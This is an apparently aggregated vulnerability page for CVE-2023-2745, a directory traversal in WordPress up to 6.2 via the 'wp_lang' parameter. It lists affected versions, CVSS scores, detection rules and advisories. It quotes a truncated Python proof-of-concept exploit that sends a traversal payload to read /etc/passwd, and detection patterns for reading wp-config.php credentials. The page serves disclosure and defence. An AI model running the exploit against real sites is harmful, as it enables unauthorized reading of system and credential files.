CVE-2023-2745
published 2023-05-17CVE-2023-2745: WordPress Core is vulnerable to Directory Traversal in versions up to, and including, 6.2, via the ‘wp_lang’ parameter. This allows unauthenticated attackers…
PriorityP182medium6.1CVSS 3.1
AVNACLPRNUIRSCCLILAN
ITWEXPLOITVulnCheck KEV
Exploited in the wild
EPSS
79.53%
99.6th percentile
WordPress Core is vulnerable to Directory Traversal in versions up to, and including, 6.2, via the ‘wp_lang’ parameter. This allows unauthenticated attackers to access and load arbitrary translation files. In cases where an attacker is able to upload a crafted translation file onto the site, such as via an upload form, this could be also used to perform a Cross-Site Scripting attack.
Affected
49 ranges· showing 25
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| debian | wordpress | < wordpress 6.1.6+dfsg1-0+deb12u1 (bookworm) | wordpress 6.1.6+dfsg1-0+deb12u1 (bookworm) |
| wordpress | wordpress | < 4.1.38 | 4.1.38 |
| wordpress | wordpress | — | — |
| wordpress | wordpress | >= 0 < 5.7.11+dfsg1-0+deb11u1 | 5.7.11+dfsg1-0+deb11u1 |
| wordpress | wordpress | >= 0 < 6.1.6+dfsg1-0+deb12u1 | 6.1.6+dfsg1-0+deb12u1 |
| wordpress | wordpress | >= 0 < 6.2.1+dfsg1-1 | 6.2.1+dfsg1-1 |
| wordpress | wordpress | >= 0 < 6.2.1+dfsg1-1 | 6.2.1+dfsg1-1 |
| wordpress | wordpress | >= 4.2 < 4.2.35 | 4.2.35 |
| wordpress | wordpress | >= 4.3 < 4.3.31 | 4.3.31 |
| wordpress | wordpress | >= 4.4 < 4.4.30 | 4.4.30 |
| wordpress | wordpress | >= 4.5 < 4.5.29 | 4.5.29 |
| wordpress | wordpress | >= 4.6 < 4.6.26 | 4.6.26 |
| wordpress | wordpress | >= 4.7 < 4.7.26 | 4.7.26 |
| wordpress | wordpress | >= 4.8 < 4.8.22 | 4.8.22 |
| wordpress | wordpress | >= 4.9 < 4.9.23 | 4.9.23 |
| wordpress | wordpress | >= 5.0 < 5.0.19 | 5.0.19 |
| wordpress | wordpress | >= 5.1 < 5.1.16 | 5.1.16 |
| wordpress | wordpress | >= 5.2 < 5.2.18 | 5.2.18 |
| wordpress | wordpress | >= 5.3 < 5.3.15 | 5.3.15 |
| wordpress | wordpress | >= 5.4 < 5.4.13 | 5.4.13 |
| wordpress | wordpress | >= 5.5 < 5.5.12 | 5.5.12 |
| wordpress | wordpress | >= 5.6 < 5.6.11 | 5.6.11 |
| wordpress | wordpress | >= 5.7 < 5.7.9 | 5.7.9 |
| wordpress | wordpress | >= 5.8 < 5.8.7 | 5.8.7 |
| wordpress | wordpress | >= 5.9 < 5.9.6 | 5.9.6 |
Detection & IOCsextracted from sources · hover to see the quote
sigma↗
id: CVE-2023-2745 flow: http(1) && http(2) matchers: - contains(body, "/wp-content/plugins") - contains_all(body_2, "DB_NAME", "DB_PASSWORD") - status_code_2 == 200
- →Alert on responses to /wp-login.php?wp_lang=<traversal> that contain sensitive strings such as 'DB_NAME' or 'DB_PASSWORD', indicating successful wp-config.php exfiltration. ↗
- →Alert on responses containing 'root:x:0:0:root' following a request with a traversal payload in wp_lang, indicating successful /etc/passwd read. ↗
- →Flag upload of crafted .po/.mo translation files to the WordPress site, which could be chained with this traversal to achieve stored XSS. ↗
- ·The Nuclei template requires a valid WordPress login (username/password) for the second HTTP step (POST to /wp-login.php) before issuing the traversal request; unauthenticated-only detection will miss the authenticated variant. ↗
- ·The traversal depth required may vary by server configuration; the exploit PoC uses five levels (../../../../../) while the Nuclei template uses seven (../../../../../../../) — tune detection patterns accordingly. ↗
CVSS provenance
nvdv3.16.1MEDIUMCVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
osv6.1MEDIUM
vulncheck6.1MEDIUM
vendor_debian5.4MEDIUM
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-xgqr-2mpj-w9qv: WordPress Core is vulnerable to Directory Traversal in versions up to, and including, 6
ghsa_unreviewed·2023-07-06
CVE-2023-2745 [MEDIUM] CWE-22 GHSA-xgqr-2mpj-w9qv: WordPress Core is vulnerable to Directory Traversal in versions up to, and including, 6
WordPress Core is vulnerable to Directory Traversal in versions up to, and including, 6.2, via the ‘wp_lang’ parameter. This allows unauthenticated attackers to access and load arbitrary translation files. In cases where an attacker is able to upload a crafted translation file onto the site, such as via an upload form, this could be also used to perform a Cross-Site Scripting attack.
OSV
CVE-2023-2745: WordPress Core is vulnerable to Directory Traversal in versions up to, and including, 6
osv·2023-05-17·CVSS 6.1
CVE-2023-2745 [MEDIUM] CVE-2023-2745: WordPress Core is vulnerable to Directory Traversal in versions up to, and including, 6
WordPress Core is vulnerable to Directory Traversal in versions up to, and including, 6.2, via the ‘wp_lang’ parameter. This allows unauthenticated attackers to access and load arbitrary translation files. In cases where an attacker is able to upload a crafted translation file onto the site, such as via an upload form, this could be also used to perform a Cross-Site Scripting attack.
VulnCheck
WordPress wordpress Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
vulncheck·2023·CVSS 6.1
CVE-2023-2745 [MEDIUM] WordPress wordpress Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
WordPress wordpress Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
WordPress Core is vulnerable to Directory Traversal in versions up to, and including, 6.2, via the ‘wp_lang’ parameter. This allows unauthenticated attackers to access and load arbitrary translation files. In cases where an attacker is able to upload a crafted translation file onto the site, such as via an upload form, this could be also used to perform a Cross-Site Scripting attack.
Affected: WordPress wordpress
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://patchstack.com/database/wordpress/wordpress/wordpress/vulnerability/wordpress-core-6-2-unau
Debian
CVE-2023-2745: wordpress - WordPress Core is vulnerable to Directory Traversal in versions up to, and inclu...
vendor_debian·2023·CVSS 5.4
CVE-2023-2745 [MEDIUM] CVE-2023-2745: wordpress - WordPress Core is vulnerable to Directory Traversal in versions up to, and inclu...
WordPress Core is vulnerable to Directory Traversal in versions up to, and including, 6.2, via the ‘wp_lang’ parameter. This allows unauthenticated attackers to access and load arbitrary translation files. In cases where an attacker is able to upload a crafted translation file onto the site, such as via an upload form, this could be also used to perform a Cross-Site Scripting attack.
Scope: local
bookworm: resolved (fixed in 6.1.6+dfsg1-0+deb12u1)
bullseye: resolved (fixed in 5.7.11+dfsg1-0+deb11u1)
forky: resolved (fixed in 6.2.1+dfsg1-1)
sid: resolved (fixed in 6.2.1+dfsg1-1)
trixie: resolved (fixed in 6.2.1+dfsg1-1)
No detection rules found.
Exploit-DB
WordPress Core 6.2 - Directory Traversal
exploitdb·2025-04-22·CVSS 5.4
CVE-2023-2745 [MEDIUM] WordPress Core 6.2 - Directory Traversal
WordPress Core 6.2 - Directory Traversal
---
# Exploit Title: WordPress Core 6.2 - Directory Traversal
# Date: 2025-04-16
# Exploit Author: Milad Karimi (Ex3ptionaL)
# Contact: [email protected]
# Zone-H: www.zone-h.org/archive/notifier=Ex3ptionaL
# Version: = 6.2
# Tested on: Win, Ubuntu
# CVE : CVE-2023-2745
import requests
from colorama import init, Fore, Style
init(autoreset=True)
url = input("E.G https://example.com/wp-login.php : ")
payload = '../../../../../etc/passwd'
response = requests.get(url, params={'wp_lang': payload})
if response.status_code == 200:
if "root:x:0:0:root" in response.text:
print(Fore.GREEN + 'Exploit successful, accessed content:')
print(Fore.GREEN + response.text)
else:
print(Fore.YELLOW + 'Accessed content, but the expected file was
not found:')
pri
Nuclei
WordPress Core <=6.2 - Directory Traversal
nuclei·CVSS 6.1
CVE-2023-2745 [MEDIUM] WordPress Core <=6.2 - Directory Traversal
WordPress Core <=6.2 - Directory Traversal
WordPress Core is vulnerable to Directory Traversal in versions up to, and including, 6.2, via the ‘wp_lang’ parameter.
Template:
id: CVE-2023-2745
info:
name: WordPress Core <=6.2 - Directory Traversal
author: nqdung2002
severity: medium
description: |
WordPress Core is vulnerable to Directory Traversal in versions up to, and including, 6.2, via the ‘wp_lang’ parameter.
remediation: |
Apply the latest security patches and updates from the vendor to address this vulnerability.
impact: |
This allows unauthenticated attackers to access and load arbitrary translation files. In cases where an attacker is able to upload a crafted translation file onto the site, such as via an upload form, this could be also used to perform a Cross-Site Scripting at
https://core.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=55765%40%2F&new=55765%40%2F&sfp_email=&sfph_mail=https://wordpress.org/news/2023/05/wordpress-6-2-1-maintenance-security-release/https://www.wordfence.com/blog/2023/05/wordpress-core-6-2-1-security-maintenance-release-what-you-need-to-know/https://www.wordfence.com/threat-intel/vulnerabilities/id/edcf46b6-368e-49c0-b2c3-99bf6e2d358f?source=cvehttp://packetstormsecurity.com/files/172426/WordPress-Core-6.2-XSS-CSRF-Directory-Traversal.htmlhttps://core.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=55765%40%2F&new=55765%40%2F&sfp_email=&sfph_mail=https://lists.debian.org/debian-lts-announce/2023/06/msg00024.htmlhttps://wordpress.org/news/2023/05/wordpress-6-2-1-maintenance-security-release/https://www.exploit-db.com/exploits/52274https://www.wordfence.com/threat-intel/vulnerabilities/id/edcf46b6-368e-49c0-b2c3-99bf6e2d358f?source=cve
2023-05-17
Published
Exploited in the wild